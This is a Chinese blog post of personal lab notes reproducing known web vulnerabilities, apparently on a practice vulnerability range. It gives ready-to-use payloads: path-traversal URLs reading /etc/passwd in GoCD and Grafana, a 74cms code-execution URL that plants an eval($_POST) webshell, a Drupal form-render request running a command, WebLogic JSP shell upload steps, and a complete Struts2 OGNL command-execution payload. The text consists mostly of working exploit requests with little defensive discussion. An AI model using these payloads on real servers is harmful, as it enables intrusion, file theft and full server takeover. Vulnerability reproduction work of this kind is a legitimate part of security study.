PTB-CVE

已于 2022-05-11 16:36:58 修改
阅读量996 收藏
点赞数
分类专栏: 笔记 胖盒子 文章标签: 网络安全
于 2022-05-05 09:29:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/124582254
版权

文章目录

Apache HTTPD 多后缀解析漏洞

如果运维人员给.php后缀增加了处理器:
AddHandler application/x-httpd-php .php
那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。

上传一个以jpg为后缀的一句话木马但是包含.php
在这里插入图片描述
会被成功解析成php
在这里插入图片描述

Tomcat WebSokcet 拒绝服务

GoCD 任意文件读取漏洞

GoCD 任意文件读取漏洞 (CVE-2021-43287) GoCD
一款先进的持续集成和发布管理系统,由ThoughtWorks开发。(不要和Google的编程语言Go混淆了!)其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。ThoughtWorks开源持续交付工具Go。使用Go来建立起一个项目的持续部署pipeline是非常快的,非常方便。
GoCD的v20.6.0 -
v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/etc/passwd
对文件进行读取。

payload

http://127.0.0.1/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/etc/passwd

在这里插入图片描述

骑士cms任意代码执行

CVE-2020-35339
漏洞简介 迅易科技 74cms是中国迅易科技公司的一套基于PHP和MySQL的在线招聘系统。

74cms version 5.0.1
存在安全漏洞,该漏洞源于应用管理控制器ConfigController.class.php和ThinkPHP Common
functions.php存在远程代码执行漏洞,攻击者可利用该漏洞可以获得服务器权限并控制服务器。

登录后台 index.php?m=Admin
在这里插入图片描述

http://192.168.121.130/.',phpinfo(),'/.com

在这里插入图片描述
在这里插入图片描述
也可以写入一句话

http://192.168.121.130/.',eval($_POST[mzq]),'/.com

在这里插入图片描述

drupal 代码执行

漏洞简介 Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。

Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal
7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站
环境启动后,访问http://your-ip:8080/,会看到drupal安装页面。使用“标准”配置文件完成 drupal
安装。因为没有mysql环境,所以安装的时候要选择sqlite数据库。安装完成后,您就可以开始利用它了。

抓取注册页面上传图片的页面
在这里插入图片描述

修改数据包

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 776-52a2c3bf-ca8f-4a05-b626-ee5fb4786c64.do-not-trust.hacking.run
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=dir

在这里插入图片描述

weblogic 文件上传

访问漏洞点
/ws_utc/config.do
在这里插入图片描述
修改工作目录

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上传jsp一句话
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Grafana 任意文件读取

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

通过默认存在的插件来拼接文件路径构造请求进行文件读取

登录后拼接路径
在这里插入图片描述
查看使用插件

/api/plugins?embedded=0

在这里插入图片描述
利用插件来拼接文件路径构造请求进行文件读取

/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

在这里插入图片描述

struts2 代码执行

描述 CVE-2020-17530 漏洞简介 Apache
Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java
Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。

Struts 存在代码注入漏洞,攻击者可利用该漏洞可以通过强迫Struts的OGNL评估来使用漏洞来运行代码。

poc

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ls /")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}

修改请求为post

POST /index.action HTTP/2
Host: 776-f31ac344-2a8d-49c2-93d4-2817de52b0f2.do-not-trust.hacking.run
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 833


------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"


%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ls /")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

在这里插入图片描述

[mzq]
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GoCD plugin 任意文件读取漏洞--CVE-2021-43287
U_U520的博客
11-29 351
【代码】GoCD plugin 任意文件读取漏洞--POC。 CVE-2021-43287
【漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339
10-13 1701
【骑士cms-代码执行】植入到可执行的文件中
骑士cms任意代码执行(CVE-2020-35339)
qq_34341458的博客
04-12 3537
本文章仅供学习使用,如用作非法用途,概不负责 0x01 漏洞介绍 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。
Vulfocus 入门+初级
大雾
05-20 3428
名称: 命令执行漏洞 描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 flag 存放在tmp路径下 名称: vulshare/python-flag:latest 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置.
针对骑士cms的反射型xss漏洞
qq_67240733的博客
03-04 644
针对骑士cms的反射型xss漏洞攻击
[文件读取]GoCD 任意文件读取漏洞 (CVE-2021-43287)
wj33333的博客
11-14 245
其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取。
渗透年入百万人才管理系统【附poc】
最新发布
jijisaq的博客
03-25 804
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。公众号:「吉吉说安全」,对我发消息【20240325】免费获取poc。
GoCD plugin 任意文件读取漏洞 CVE-2021-43287
weixin_44522540的博客
09-07 513
GoCD任意文件读取
74cms 6.0.20 getshell
m0_51377238的博客
12-16 319
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。http://serverName/index.php/模块/控制器/操作m参数表示模块,c参数表示控制器,a参数表示操作/方法,后面的表示其他GET参数。
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
74cms v5.0.1 漏洞复现
p_lang的博客
04-30 3179
一、环境搭建 这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。 1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html 2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。 3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。 OK,
骑士CMSgetshell复现
m0_48520508的博客
12-22 2382
0x00简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。 0x01漏洞概述 骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,甚至会照成控制服务器等严重漏洞。 0x02影响版本 骑士 CMS < 6.0.48 0x03环境搭建 环境:windows2008R2+phpstudy 1.cms下载,在骑士cms官网下载6.0.20
修改了模板文件tpl如何立即生效_骑士CMSassign_resume_tpl远程代码执行漏洞
weixin_42511990的博客
01-14 330
漏洞描述骑士CMS是一套基于PHP+MYSQL的免费网站管理系统。骑士CMS官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。漏洞利用简单,且相关利用细节已公开。影响版本骑士CMS < 6.0.48安全版本骑士CMS 6.0.48安全建议1. 升级骑士CMS至最新版本。2....
【漏洞复现】Grafana任意文件读取漏洞 (CVE-2021-43798)
做自己喜欢的事,并将其发挥到极致!
12-08 1184
0X01 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 0x02 源码分析 搜索漏洞存在路径 /public/plugins/ 在api.go文件中 r.Get("/public/plugins/:pluginId/*", hs.getPluginAssets) 跟踪对应的 getPlugin
骑士cms最新全局SQL注入(官方奇葩修复案例)
koothon的专栏
07-17 2155
这个漏洞,我们看看骑士怎么修复的 http://wwwcto2uploudpic/Article/201412/359995.html 首先试试带入单引号,用宽字节试试,可以看到显示数据库出错   看看数据库怎么带入的吧 可以看到出错了,单引号被带入sql语句了 居然还可以注入,没有过滤 找到/include/m
EmpireCMS_V7.5的一次审计
xiaoi123的博客
10-11 1949
i春秋作家:Qclover 原文来自:EmpireCMS_V7.5的一次审计   EmpireCMS_V7.5的一次审计 1概述    最近在做审计和WAF规则的编写,在CNVD和CNNVD等漏洞平台寻找各类CMS漏洞研究编写规则时顺便抽空对国内一些小的CMS进行了审计,另外也由于代码审计接触时间不是太常,最近一段时间也跟着公司审计项目再次重新的学习代码审计知识,对于入行已久的各位审计...
使用pycharm绘制PTB-XL数据库的波形
05-31
好的,让我来为你介绍一下如何使用 PyCharm 绘制 PTB-XL 数据库的波形。 PTB-XL 数据库是一个心电信号数据库,它包含了多个心电信号的波形数据。为了绘制这些波形,我们需要使用 Python 中的 Matplotlib 库。下面是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值